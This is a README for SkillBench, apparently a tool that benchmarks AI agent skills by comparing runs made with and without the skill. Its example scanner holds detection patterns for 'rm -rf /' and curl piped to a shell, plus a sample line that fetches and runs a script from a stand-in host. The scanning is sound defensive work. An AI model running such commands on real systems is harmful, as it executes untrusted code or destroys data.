boheling / skillbench
Adversarial, deterministic benchmarking for AI agent skills: measures whether a skill makes the agent measurably better. Includes biomedical eval cases.
SkillBench is a testing tool that measures whether an AI skill actually helps an assistant perform better. It compares two versions of an AI solving the same tasks - one with the skill loaded, one without - and uses automatic rules to grade their outputs. The tool also scans for security problems like hardcoded secrets or dangerous commands. It produces clear reports with scores across four areas: correctness, security, completeness, and whether the skill meaningfully improved results over a baseline. The project includes pre-built test cases for biomedical work like BLAST searches, protein structure analysis, drug interaction checks, and genetic variant interpretation.
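The with-skill versus without-skill comparison can be pictured with a small sketch. This is not SkillBench's actual code: the `Rule` type, the `grade` and `uplift` functions, the two example rules, and the sample outputs are all hypothetical, chosen only to show how deterministic rules could grade two outputs for the same task and report the difference.

```python
import re
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Rule:
    """Hypothetical deterministic rule: a name plus a predicate over output text."""
    name: str
    check: Callable[[str], bool]


def grade(output: str, rules: list[Rule]) -> float:
    """Return the fraction of rules the output satisfies (0.0 to 1.0)."""
    if not rules:
        return 0.0
    passed = sum(1 for rule in rules if rule.check(output))
    return passed / len(rules)


def uplift(with_skill: str, baseline: str, rules: list[Rule]) -> float:
    """Score difference between the skill-loaded run and the baseline run."""
    return grade(with_skill, rules) - grade(baseline, rules)


# Illustrative rules for a protein-structure task (assumed, not from the project).
rules = [
    Rule("mentions_pdb_style_id",
         lambda text: re.search(r"\b[0-9][A-Za-z0-9]{3}\b", text) is not None),
    Rule("reports_resolution",
         lambda text: "resolution" in text.lower()),
]

# Made-up strings standing in for saved agent outputs.
with_skill_output = "Structure 1TUP retrieved; resolution 2.2 A."
baseline_output = "I could not find a structure."

print(uplift(with_skill_output, baseline_output, rules))
```

Because the rules are plain predicates, the same pair of outputs always yields the same grade, which is what makes a comparison of this kind repeatable.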
How It Works
You create a SKILL.md file with instructions for tasks like analyzing genes, finding protein structures, or checking drug interactions.
SkillBench checks your skill files for risky patterns like hardcoded passwords, dangerous commands, or attempts to send your data somewhere else.
SkillBench creates two parallel test runs: one AI gets your skill loaded, the other solves the same tasks without any guidance.
Each AI tackles the same challenges - retrieving protein structures, interpreting genetic variants, checking drug safety - and saves its results.
Run a security-only check if you just want to find hidden vulnerabilities.
Run a complete comparison if you want to know whether your skill actually helps.
A clean report shows you four scores: correctness, security, completeness, and whether having your skill actually beat the baseline.
Scores of 75+ mean your skill is recommended, 50-74 means acceptable, below 50 means it needs improvement before relying on it.
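Two of the steps above, the security scan and the score bands, can be sketched in a few lines. The pattern names, the regular expressions, and the function names `scan_skill` and `verdict` are assumptions made for illustration; the project's real rule set is not shown here. The sketch also assumes scores run from 0 to 100 and treats any fractional score below 75 as falling in the lower band.

```python
import re

# Hypothetical risky patterns; the real SkillBench rules may differ.
RISKY_PATTERNS = {
    "hardcoded_secret": re.compile(
        r"(?i)\b(password|api[_-]?key|secret)\b\s*[:=]\s*['\"][^'\"]+['\"]"
    ),
    "destructive_command": re.compile(r"\brm\s+-rf\s+/"),
    "pipe_to_shell": re.compile(r"\bcurl\b[^\n|]*\|\s*(?:sh|bash)\b"),
}


def scan_skill(text: str) -> list[str]:
    """Return the names of all risky patterns found in the skill text."""
    return [name for name, pattern in RISKY_PATTERNS.items() if pattern.search(text)]


def verdict(score: float) -> str:
    """Map a score to the bands described above (0-100 scale assumed)."""
    if not 0 <= score <= 100:
        raise ValueError(f"score must be between 0 and 100, got {score}")
    if score >= 75:
        return "recommended"
    if score >= 50:
        return "acceptable"
    return "needs improvement"


# Made-up skill text used only to exercise the scan.
sample_skill = 'password = "hunter2"\nrun: curl http://x.example/i.sh | sh'

print(scan_skill(sample_skill))
print(verdict(82), verdict(60), verdict(31))
```

A scan like this only catches what its patterns describe, so a clean result means no known pattern matched rather than that the skill is safe.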